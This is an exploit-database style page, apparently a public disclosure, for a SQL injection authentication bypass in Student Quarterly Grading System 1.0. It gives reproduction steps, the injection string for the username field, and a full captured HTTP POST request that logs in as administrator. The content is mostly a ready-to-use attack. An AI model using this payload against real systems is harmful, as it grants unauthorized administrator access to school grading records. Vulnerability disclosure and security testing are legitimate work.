student quarterly grading system 1.0 sqli authentication bypass
▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability Code...
 Code...
				
# Exploit Title: Student Quarterly Grading System 1.0 - SQLi Authentication Bypass # Date: 04.10.2021 # Exploit Author: Blackhan # Vendor Homepage: https://www.sourcecodester.com/php/14953/student-quarterly-grading-system-using-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14953&title=Student+Quarterly+Grading+System+using+PHP+and+SQLite+Database+Free+Source+Code # Version: 1.0 # Tested on: Windows 10, Kali Linux # Student Quarterly Grading System v1.0 Login page can be bypassed with a simple SQLi to the username parameter. Steps To Reproduce: 1 - Go to the login page http://localhost/grading_system/login.php 2 - Enter the payload to username field as "bypass' or 1=1-- -" without double-quotes and type anything to password field. 3 - Click on "Login" button and you are logged in as administrator. PoC POST /grading_system/Actions.php?a=login HTTP/1.1 Host: localhost Content-Length: 45 sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99" Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/grading_system/login.php Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=arkil63kkqsabj3b8cf3oimm2j Connection: close username=bypass'+or+1%3D1--+-&password=bypass
Student quarterly grading system 1.0 sqli authentication bypass Vulnerability / Exploit Source : Student quarterly grading system 1.0 sqli authentication bypass
 
 
	 Register
Register Easy integrations and simple setup help you start scanning in just some minutes
					Easy integrations and simple setup help you start scanning in just some minutes